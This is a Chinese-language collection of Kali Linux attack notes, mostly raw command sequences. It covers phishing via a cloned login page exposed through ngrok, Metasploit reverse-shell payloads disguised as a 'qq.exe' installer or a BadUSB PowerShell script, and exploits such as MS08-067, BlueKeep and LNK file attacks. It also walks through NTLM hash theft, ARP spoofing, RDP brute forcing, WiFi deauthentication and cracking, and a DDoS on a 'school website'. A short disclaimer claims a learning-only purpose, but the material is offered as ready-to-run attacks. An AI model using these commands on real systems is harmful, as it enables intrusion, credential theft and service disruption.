Kali Linux (杂篇)
”该工具仅限于安全技术学习,请勿用于其它攻击行为,一切使用造成的违法后果,皆与作者无关“
如何克隆任何网站
社会工程学攻击
# setoolkit
> 1
> 2
set:webattack> 3
> 2
> set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.17.130]:
返回一个IP(本机的IP/监听的IP)
set:webattack> Enter the url to clone:http://192.168.xxx.xxx/bWAPP/login.php
开始进行创建......
//访问 本机的IP 192.168.17.130 之后登录
会在监听端口显示 登录信息(内网环境中)
2 > firefox-esr
192.168.xxx.xxx(靶场环境)
//在外网需要进项行 穿透服务
3> ./ngrok http 80 //开启,进行映射到80端口
把链接发送到任何地方
如何恢复目标计算机删除的文件
文件删除之后,文件没有在回收站,应该如何恢复?
——> Kali远程渗透恢复目标删除数据过程
msf6 exploit(multi/handler)> session -i 1
meterpreter> getuid
meterpreter> getsystem
meterpreter> background
msf6 exploit(multi/handler)> search post/windows
msf6 exploit(multi/handler)> use post/windows/gather/forensics/enum_drives
msf6 post(windows/gather/forensics/enum_drives)> options
msf6 post(windows/gather/forensics/enum_drives)> set session 1
msf6 post(windows/gather/forensics/enum_drives)> exploit //查看盘符
......//显示的ID
msf6 post(windows/gather/forensics/enum_drives)> use post/windows/gather/forensics/recovery_files //这个模块主要就是进行数据恢复
msf6 post(windows/gather/forensics/recovery_files)> options
msf6 post(windows/gather/forensics/recovery_files)> set drive E:
msf6 post(windows/gather/forensics/recovery_files)> set session 1
msf6 post(windows/gather/forensics/recovery_files)> exploit
...... //检索删除的文件
msf6 post(windows/gather/forensics/recovery_files)> options
msf6 post(windows/gather/forensics/recovery_files)> set files ID,ID2,ID3...... //进行恢复
如何从某赌某诈骗的恶意手机app中提取有用的信息
# apkleaks
python3 apkleaks.py -f /home/hackerxxls/Desktop/新建文件夹/456.apk -o test1.txt
//不断分析的软件包 得到 [IP_Address]
# Apkatshu
./Apkatshu.sh apktool /home/hackerxxls/Desktop/新建文件夹/123.apk
cd Outpkatshu
ls
用pdf等的捕获 Windows的Ntlm-hash,验证明文账密
git clone https://github.com/Greenwolf/ntlm_theft
pip3 install xlsxwriter
ntlm windows sso Im hash
nt hash ntlm hash 算法 unicode
cd ntlm_theft
ls
python3 ntlm_theft.py -h
python3 ntlm_theft.py -g all -s 192.168.17.142 -f test
ls
cd test
ls
//窃取器文件的生成
2# responder -I eth0 //开始监听
3# cd /usr/share/responder/logs
ls
john SMB_NTLMv2-SSP-192.168.17.137.txt //哈希破解,验证哈希
ARP 欺骗
Arpspoof 工具介绍
Arpspoof 是一个非常好的ARP欺骗的源代码程序。它的运行不会影响整个网络的通信,该工具
通过替换传输中的数据从而到达对目标的欺骗。
一、URL 流量操纵攻击
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward //开启路由转发功能
root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1 //启动Arpspoof注入攻击目标系统。
攻击的方法是攻击者(192.168.6.1)和目标系统(192.168.6.101)
一、首先欺骗目标系统
二、端口重定向攻击
三、捕获并监视无线网络数据
# apt-get install dsniff
echo 1 > /proc/sys/net/ipv4/ip_forward //每次执行都要重新进行一次开启
arpspoof -i eth0 -t 192.168.223 192.168.223.142
2# urlsnarf -i eth0 //捕获目标计算机的url(网址)
3# sudo driftnet -i eth0 //捕获一下图片(图片劫持)
Kali Linux “撬棍”
crowbar(github)
msfconsole
msf6> search rdp
msf6> use auxiliary/scanner/rdp/rdp_scanner
msf6 auxiliary(scanner/rdp/rdp_scanner)> options
msf6 auxiliary(scanner/rdp/rdp_scanner)> set RHOSTS 192.168.xxx.xxx
msf6 auxiliary(scanner/rdp/rdp_scanner)> exploit
......
msf6 auxiliary(scanner/rdp/rdp_scanner)> exit
2#
cd /home/sth/文档/crowbar-master
ls
./crowbar.py --server 192.168.223.154/32 -b rdp -u USER -C /root/pass.txt //爆破得到密码
......
3#
sudo xfreerdp /u:USER /p:xxls123456 /v:192.168.223.154 //捕获(桌面情况)
用 Kali 为学校网站做贡献
unzip pentmenu-master.zip
cd pentmenu-master/
chmod a+x pentmenu
su root
./pentmenu
Pentmenu>2
Pentmenu>9
...
Enter targets:
[目标网站的URL]
Enter target port (defaults to 80):
Using port 80
Enter number of connections to open (default 2000):
20000
.....(y)
Kali 爬虫的几种方式
1#
msfconsole
msf6> search msfcrawler
msf6> use auxiliary/crawler/msfcrawler
msf6 auxiliary(crawler/msfcrawler)> options
msf6 auxiliary(crawler/msfcrawler)> set rhosts 192.168.17.133
msf6 auxiliary(crawler/msfcrawler)> set THREAD 10 //设置线程数
msf6 auxiliary(crawler/msfcrawler)> exploit
... ...
2#
mkdir 123
cd 123
httrack http://192.168.17.133/
... ...
3#
OWASP ZAP
如何用 tor服务隐藏自己的渗透行为!
~#
apt-get install proxychains
apt-get install tor
man proxychains //打开代理链
... ... //找到文件 /etc/proxychains.conf
sudo vim /etc/proxychains.conf
把 strict_chain 禁用 #strict_chain
打开 #random_chain ——> random_chain(随机代理链)
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
sudo systemctl status tor.service
sudo systemctl start tor.service
sudo systemctl stop tor.service
sudo proxychains firefox ip138.com
sudo proxychains nmap -sS 192.168.18.*
如何利用世界上最流行的扫描程序做漏扫!
~#
dpkg -i Nessus-10.0.2-debian6_amd64.deb //解压
[/home/kali/Downloads]
/bin/systemctl start nessusd.service //开启服务
copy URL[地址] 在浏览器中打开 https://kali:8834/#/
黑客攻击检测之 Hfish(蜜罐)
~#
cp hfish-2.8.1-linux-arm64.tgz /opt/Hfish/
cd /opt/Hfish/
ls
tar -xzvf hfish-2.8.1-linux-arm64.tgz
ls
rm -rf hfish-2.8.1-linux-arm64.tgz
cd 2.8.1/
cat README.md
cd ..
ls
./install.sh
nohup: appending output to 'nohup.out'
cat nohup.out
netstat -altunp |grep hfish
//默认用户名密码为:**admin / HFish2021**
//Linux 进入hfish安装路径的版本目录,执行:**./tools -mode resetpwd**
//Windows 打开cmd进入hfish安装路径的版本目录:执行:**./tools -mode resetpwd**
//确认防火墙开启4433和4434端口
登陆链接:https://[ip]:4433/web/login
账号:admin
密码:HFish2021
如何对本地网络进行限制
“邪恶制造者”
~#
git clone https://github.com/bitbrute/evillimiter.git
git clone git://github.com/bitbrute/evillimiter.git
cd evillimiter
sudo python3 setup.py install //安装
evillimiter //启动工具
(Main) >>> ?
(Main) >>> scan //扫描设备
(Main) >>> hosts
(Main) >>> limit 3 100kbit
(Main) >>> hosts //查看状态
(Main) >>> free 3 //解除状态
(Main) >>> block 3 //网络阻断
如何破解加密压缩包和pdf文件
~# 破解ZIP
zip2john -h
zip2john crack.zip >> pass.txt //添加加密的压缩包文件,输出一个文档(提取压缩包的 哈希密码值)
john pass.txt //用john破解哈希密码
cd /usr/share/john
ls
vim john.conf //可以更改字典的位置
~# 破解PDF
apt install pdfcrack
pdfcrack -w /root/dict/pass/pass.txt crack.pdf //破解
如何在任意图片和音乐中加密嵌入重要文件!
~#
apt-get install steghide
steghide --help
steghide embed -ef 123 -cf 6.jpg -sf 61.jpg -Z //进行嵌入
Enter passphrase:
steghide extract -sf 61.jpg //提取
Enter passphrase:
如何利用psh脚本,对win11进行远程渗透
~#
msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.17.128 lport=443 -f pash > shell.ps1
~#
msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler)> options
msf6 exploit(multi/handler)> set lhost 192.168.17.128
msf6 exploit(multi/handler)> set lport 443
msf6 exploit(multi/handler)> exploit
... ...
meterpreter>
>Windows PowerShell<
//输入指令,绕过执行策略
//利用 badUSB 或其他应用程序去执行
> powershell -ep bypass
> .\shell.ps1
如何安装一款黑客御用无线网络攻击系统
wifislax.com/category/wifislax-64.bits/download-wifislax-x64/
Windows 入侵(例)
~# WindowsXP
msfconsole
msf6> search ms08_67
msf6> use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi)> options
msf6 exploit(windows/smb/ms08_067_netapi)> set rhosts 192.168.223.130
msf6 exploit(windows/smb/ms08_067_netapi)> info //查看用于的系统版本
msf6 exploit(windows/smb/ms08_067_netapi)> set target 34
msf6 exploit(windows/smb/ms08_067_netapi)> check
msf6 exploit(windows/smb/ms08_067_netapi)> run
... ...
meterpreter> run vnc
meterpreter> exit
msf6 exploit(windows/smb/ms08_067_netapi)> save //保存!
只需一个网址入侵 Windows系统(例)
~# WindowsXP
msfconsole
msf6> search ms10_018
msf6> use exploit/windows/browser/ms10_018_ie_behaviors
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> options
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set srvhost 192.168.233.129
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> set lport 8080
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> exploit
... ...
//生成一个URL
http://192.168.223.129:8080/6FZhJ6
... ...
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> sessions
msf6 exploit(windows/browser/ms10_018_ie_behaviors)> sessions -i 1
meterpreter>
meterpreter> getpid //获取现在进入后门的进程
meterpreter> ps //查看进程
meterpreter> migrate 1368 //进程转移
meterpreter> getpid
软件安装 Windows系统入侵(例)
~#
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.223.129 LPORT=8080 -f exe -a x86 --platform win -o qq.exe
msfconsole
msf6> use exploit/muliti/handler
msf6 exploit(muliti/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(muliti/handler)> options
msf6 exploit(muliti/handler)> set LHOST 192.168.223.129
msf6 exploit(muliti/handler)> set LPORT 8080
msf6 exploit(muliti/handler)> exploit
meterpreter> run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
meterpreter>
2~#
rdesktop 192.168.223.128 //获取桌面
Windows 7电脑系统漏洞的入侵(例)
cve 2019-0708 专门针对:3389端口
~#
nmap -v -sn 192.168.223.120-150 //搜索公网内的一段IP地址
msfdb run //打开数据库
msf6> search cve_2019_0708
msf6> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> options
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set RHOSTS 192.168.223.142 //刚才搜索到的IP地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> info
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> set target 4
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce)> run
... ...
meterpreter>
U盘病毒渗透入侵 Windows
~#
msfconsole
msf6> search 2017_8464
msf6> use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> options
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> set lhost 192.168.223.129
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> exploit
//生成木马文件 /home/sth/.msf4/local/
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce)> back
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler)> options
msf6 exploit(multi/handler)> set lhost 192.168.223.129
msf6 exploit(multi/handler)> run
... ...
//插入U盘反弹shell
meterpreter>
Windows系统入侵 ms 10-046 漏洞利用(例)
ms15-020 远程代码,共享文件执行漏洞
漏洞简介:
Microsoft Windows 没有正确处理 DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程 WebDAV 或 SMB 共享上的某些文件利用此漏洞,
成功利用后可导致加载任意库。Windows 使用 .lnk 来定义文件或者目录的快捷方式,可以使用 .CPL文件来自定义图标。问题是,在 Windows中,图标从模块(或者可执行文件或动态链接库)加载。
事实上,cpl 文件实际上是 DLL 文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用 .LNK 文件来执行任意代码。
渗透过程
WindowsXP
~#
msfconsole
msf6> search ms15-020
msf6> use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> info
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set UNCHOST 192.168.1.3 //设置共享主机IP地址
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set UNCSHARE share //设置共享文件的文件夹 这里主机 192.168.1.3 在C盘下的share里文件夹开启了共享,提前创建好共享
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> set LHOST 192.168.1.7 //设置本地反弹地址
msf6 exploit(windows/fileformat/ms15_020_shortcut_icon_dllloader)> exploit
... ...
//把生成的文件复制到共享主机的共享文件下
2~# 开启监听
msfconsole
msf6> use exploit/multi/handler
msf6 exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler)> set LHOST 192.167.1.7
msf6 exploit(multi/handler)> exploit
... ...
使用DDOS攻击网站(易)
~#
git clone https://github.com/Andysun06/ddos
cd ddos
python ddos-p3.py
请输入IP :
攻击端口 :
Traceback (most recent call last):
使用 Kali 破解无线WiFi密码
需要使用一个无线网卡,在 kali 中的 可移动设备 中进行连接,无线网卡需要在kali系统上免驱
kali无线监听网卡免驱
~#
ifconfig —— > wlan0
airmon-ng //检查网卡是否支持监听功能
airmon-ng start wlan0 //开启无线网卡的监听模式
ifconfig
airodump-ng wlan0mon //扫描附近的WiFi信号
... ...
//需要记住WiFi的 BSSID、CH
airodump-ng -c 1 --bssid 6c:06:D6:58:xx:xx -w /home/kali/Desktop/handshake wlan0mon //开始抓包
~#
//ACK攻击
aireplay-ng -o 10 -a 6c:06:D6:58:xx:xx -c 9A:66:B7:56:5C:xx wlan0mon //发起ACK攻击
... ... //会生成 cap文件
aircrack-ng /home/kali/Desktop/字典.txt -b 6c:06:D6:58:xx:xx /home/Desktop/handshake-01.cap //开始破解
......
~#
airmon-ng check kill //杀死干扰的进程
airmon-ng —— > wlano
airmon-ng start wlan0
airodump-ng wlan0 //监听
airodump-ng -w /home/kali/waifei/1 --bssid 92:BE:20:CA:xx:xx -c 1 wlan0
aircplay-ng -0 50 -a 92:BE:20:CA:xx:xx -c 9C:2E:A1:02:D7:xx -D wlan0
aircrack-ng /home/kali/waifei/1-01.cap -b 9C:2E:A1:02:D7:xx -w /home/kali/Desktop/weaidfai.txt
(medusa)破解任何在线协议密码
//搭建 ftp
~#
medusac -h 192.168.174.139 -u xxls -P /root/wenben/pass.txt -M ftp -e ns -F
Kali 中英文切换
~#
dpkg-reconfigure locales //本地配置